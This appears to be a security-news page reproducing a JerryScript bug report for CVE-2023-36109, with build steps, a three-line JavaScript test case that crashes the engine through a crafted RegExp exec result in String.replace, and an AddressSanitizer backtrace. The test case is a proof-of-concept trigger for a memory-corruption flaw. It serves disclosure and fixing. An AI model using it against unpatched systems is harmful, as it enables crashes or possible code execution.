Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-36109: ==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap · Issue #5080 · jerryscript-project/jerryscript

Buffer Overflow vulnerability in JerryScript version 3.0, allows remote attackers to execute arbitrary code via ecma_stringbuilder_append_raw component at /jerry-core/ecma/base/ecma-helpers-string.c.

CVE
#vulnerability#ubuntu#linux#js#buffer_overflow

JerryScript revision

Version: v3.0.0

Build platform

Linux cqian-s2 5.4.0-148-generic #165-Ubuntu SMP Tue Apr 18 08:53:12 UTC 2023 x86_64 x86_64 x86_64 GNU/Linu

Build steps

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

let evil = new RegExp();
evil.exec = () => ({ 0: "1234567", length: 1, index: 0 });
"abc".replace(evil, "$'");

Execution platform

Unnecessary if the same as the build platform.

Execution steps

List the steps that trigger the bug.

E.g., if a bug is snapshot-specific:

build/bin/jerry-snapshot generate -o testcase.js.snapshot testcase.js build/bin/jerry --exec-snapshot testcase.js.snapshot

Output

SEGMENT

Backtrace

==1327323==ERROR: AddressSanitizer: memcpy-param-overlap: memory ranges [0x55fb3005c209,0x55fc3005c205) and [0x55fc3005c0f8, 0x55fd3005c0f4) overlap
    #0 0x7fc34e7684ed in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:823
    #1 0x55fc2ff5cea1 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34
    #2 0x55fc2ff5cea1 in ecma_stringbuilder_append_raw /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/base/ecma-helpers-string.c:2609
    #3 0x55fc2ffe19b0 in ecma_builtin_replace_substitute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-helpers.c:982
    #4 0x55fc2ffe9c25 in ecma_regexp_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:2924
    #5 0x55fc2ffe9c25 in ecma_builtin_regexp_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:602
    #6 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #7 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #8 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #9 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #10 0x55fc2ffec6dc in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
    #11 0x55fc2ffec6dc in ecma_builtin_string_prototype_object_replace_helper /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:555
    #12 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1416
    #13 0x55fc2ffeda96 in ecma_builtin_string_prototype_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-string-prototype.c:1369
    #14 0x55fc2ff7dedc in ecma_builtin_dispatch_routine /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #15 0x55fc2ff7dedc in ecma_builtin_dispatch_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #16 0x55fc2ff7dedc in ecma_op_function_call_native_built_in /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #17 0x55fc2ff84908 in ecma_op_function_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #18 0x55fc2ffcf524 in ecma_op_function_validated_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
    #19 0x55fc2ffcf524 in opfunc_call /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:758
    #20 0x55fc2ffcf524 in vm_execute /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5217
    #21 0x55fc2ffbca95 in vm_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:5312
    #22 0x55fc2ff5f2a7 in vm_run_global /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/vm/vm.c:286
    #23 0x55fc2ff5f2a7 in jerry_run /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-core/api/jerryscript.c:548
    #24 0x55fc2ff51a41 in jerryx_source_exec_script /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-ext/util/sources.c:68
    #25 0x55fc2ff51a41 in main /home2/dingjie/jsfuzz/fuzz_target/jerryscript/jerry-main/main-desktop.c:156
    #26 0x7fc34e411082 in __libc_start_main ../csu/libc-start.c:308
    #27 0x55fc2ff52abd in _start (/home2/dingjie/jsfuzz/fuzz_target/jerryscript/asan/bin/jerry+0x1eabd)

Credit: Lime

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907